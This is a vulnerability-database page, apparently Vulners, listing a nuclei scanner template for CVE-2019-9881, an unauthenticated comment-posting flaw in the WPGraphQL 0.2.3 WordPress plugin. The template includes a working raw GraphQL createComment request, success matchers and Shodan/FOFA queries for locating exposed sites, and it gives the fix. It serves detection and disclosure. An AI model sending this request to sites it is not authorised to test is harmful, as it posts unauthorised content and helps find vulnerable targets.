Lucene search
K

WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

The createComment mutation in WPGraphQL 0.2.3 lets unauthenticated users post comments on any WordPress post even if comments are disabled.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress WPGraphQL 0.2.3 Plugin - Multiple Vulnerabilities
21 May 201900:00
zdt
Circl
CVE-2019-9881
15 Sep 202515:16
circl
CNVD
WordPress WPGraphQL Access Control Error Vulnerability
22 May 201900:00
cnvd
Check Point Advisories
WordPress Plugin WPGraphQL Information Disclosure (CVE-2019-9879; CVE-2019-9880; CVE-2019-9881)
24 Jun 201900:00
checkpoint_advisories
CVE
CVE-2019-9881
10 Jun 201917:37
cve
Cvelist
CVE-2019-9881
10 Jun 201917:37
cvelist
NVD
CVE-2019-9881
10 Jun 201918:29
nvd
Packet Storm
WordPress WPGraphQL 0.2.3 Authentication Bypass / Information Disclosure
21 May 201900:00
packetstorm
Prion
Code injection
10 Jun 201918:29
prion
Positive Technologies
PT-2019-19914
10 Jun 201900:00
ptsecurity
Rows per page
id: CVE-2019-9881

info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting
  author: intelligent-ears
  severity: medium
  description: |
    The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled.
  impact: |
    An attacker can exploit this vulnerability to post unauthorized comments on WordPress posts, potentially leading to content manipulation and defacement.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9881
    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
    - https://wpvulndb.com/vulnerabilities/9282
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-9881
    cwe-id: CWE-306
    epss-score: 0.18832
    epss-percentile: 0.96942
    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpengine
    product: wpgraphql
    framework: wordpress
    shodan-query: http.title:"WordPress" "graphql"
    fofa-query: body="/wp-content/plugins/wp-graphql/"
    publicwww-query: "/wp-content/plugins/wp-graphql/"
  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,vkev,vuln

variables:
  string: "{{randstr}}"
  client: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "mutation { createComment(input: { postId: 1, userId: 1, content: \"{{string}}\", clientMutationId: \"{{client}}\" }) { clientMutationId } }"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains_all(body, 'createComment','clientMutationId','\{\"data\":','{{client}}')
        condition: and
# digest: 490a0046304402200daef67a2086d3407fce4265d79e2cab416de3c0fdcd64fe5b5247fe68bfc7a502200f37a93a79bbab45f0fbe5d5fa7ee7e5c0c31061642017a00aeb04496531f3d0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
CVSS 35.3
EPSS0.18832
21